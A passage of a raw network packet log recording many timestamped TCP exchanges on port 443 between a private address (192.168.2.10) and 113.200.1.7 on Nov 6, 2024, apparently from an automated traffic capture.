                                                                                                                                            Nov 6, 2024 16:40:51.540031910 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.540088892 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.540674925 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.540692091 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.540762901 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.540803909 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.540854931 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.541153908 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.541168928 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.541238070 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.541254044 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.541313887 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.551505089 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.595936060 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.595961094 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.596035957 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.596062899 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.596103907 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.596162081 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.596175909 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.596230030 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.596237898 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.596281052 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.596638918 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.596653938 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.596704006 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.596709013 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.596748114 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.654090881 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.654115915 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.654253960 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.654259920 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.654284000 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.654309034 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.654336929 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.654342890 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.654402971 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.654418945 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.654531956 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.654547930 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.654609919 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.654616117 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.654654026 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.654870987 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.654887915 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.654937029 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.654939890 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.654979944 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.658528090 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.658546925 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.658598900 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.658611059 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.658659935 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.658865929 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.658880949 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.658929110 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.658932924 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.658972979 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.659629107 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.659646988 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.659701109 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.659706116 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.659750938 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.659961939 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.659977913 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.660023928 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.660032034 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.660070896 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.660583973 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.660598993 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.660655975 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.660660982 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.660701036 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.715039015 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.715065956 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.715193033 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.715209961 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.715256929 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.715411901 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.715430021 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.715492964 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.715497971 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.715542078 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.715785980 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.715802908 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.715852976 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.715857029 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.715924025 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.773402929 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.773427963 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.773490906 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.773516893 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.773534060 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.773556948 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.773597002 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.773921967 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.773936033 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.773989916 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.773993969 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.774039984 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.774346113 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.774360895 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.774415970 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.774420977 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.774477959 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.777714014 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.777733088 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.777785063 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.777792931 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.777831078 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.777967930 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.777981997 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.778033972 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.778038025 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.778094053 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.778341055 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.778353930 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.778400898 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.778404951 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.778431892 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.779062033 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.779076099 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.779126883 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.779130936 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.779165983 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.779779911 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.779794931 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.779849052 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.779853106 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.779894114 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.834306955 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.834332943 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.834419966 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.834443092 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.834490061 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.834676981 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.834692001 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.834747076 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.834749937 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.834789991 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.835215092 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.835230112 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.835278034 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.835282087 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.835323095 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.871459961 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.871490002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.871604919 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.871629000 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.871680021 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.892911911 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.892942905 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893029928 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893049002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893096924 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893100977 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893105984 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893119097 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893134117 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893168926 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893172979 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893205881 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893404007 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893418074 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893462896 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893466949 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893502951 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893831015 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893845081 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893877029 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893881083 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.893907070 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.893925905 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.897936106 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.897954941 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.898021936 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.898027897 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.898066044 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.898758888 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.898797035 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.898850918 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.898855925 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.898895979 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.899122000 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.899136066 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.899193048 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.899195910 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.899233103 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.900775909 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.900794029 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.900842905 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.900847912 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.900881052 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.901299953 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.901314020 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.901366949 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.901371002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.901402950 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.953665972 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.953690052 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.953767061 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.953777075 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.953826904 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.954000950 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.954015970 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.954072952 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.954077005 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.954112053 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.954549074 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.954565048 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.954622030 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.954624891 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.954679966 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.990446091 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.990462065 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.990550041 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:51.990556002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:51.990616083 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.012264013 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012280941 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012377024 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.012382030 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012444019 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.012593031 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012608051 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012660980 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.012664080 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012707949 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.012841940 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012859106 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012916088 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.012919903 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.012953997 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.013277054 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.013290882 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.013344049 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.013346910 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.013386011 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.017205000 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.017219067 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.017273903 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.017277002 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.017309904 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.017429113 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.017443895 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.017503023 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.017507076 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.017540932 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.017954111 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.017966986 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.018013954 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.018018007 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.018050909 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.019617081 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.019632101 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.019681931 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.019685984 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.019716978 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.020183086 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.020411015 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.020426035 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.020481110 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.020484924 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.020519972 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.020634890 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.020648003 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.020680904 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.020684958 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.020714045 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.020735025 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.021718025 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.021771908 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073451042 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073476076 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073524952 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073550940 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073566914 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073673964 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073673964 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073685884 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073704004 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073724985 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073730946 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073770046 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073770046 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.073956013 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.073970079 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.074019909 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.074026108 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.074058056 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.109939098 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.109956980 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.110039949 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.110064030 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.110121012 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.131382942 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.131400108 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.131483078 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.131489038 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.131525040 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.132524967 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.132539034 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.132594109 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.132597923 CET44357356113.200.1.7192.168.2.10
                                                                                                                                            Nov 6, 2024 16:40:52.132638931 CET57356443192.168.2.10113.200.1.7
                                                                                                                                            Nov 6, 2024 16:40:52.132858038 CET44357356113.200.1.7192.168.2.10
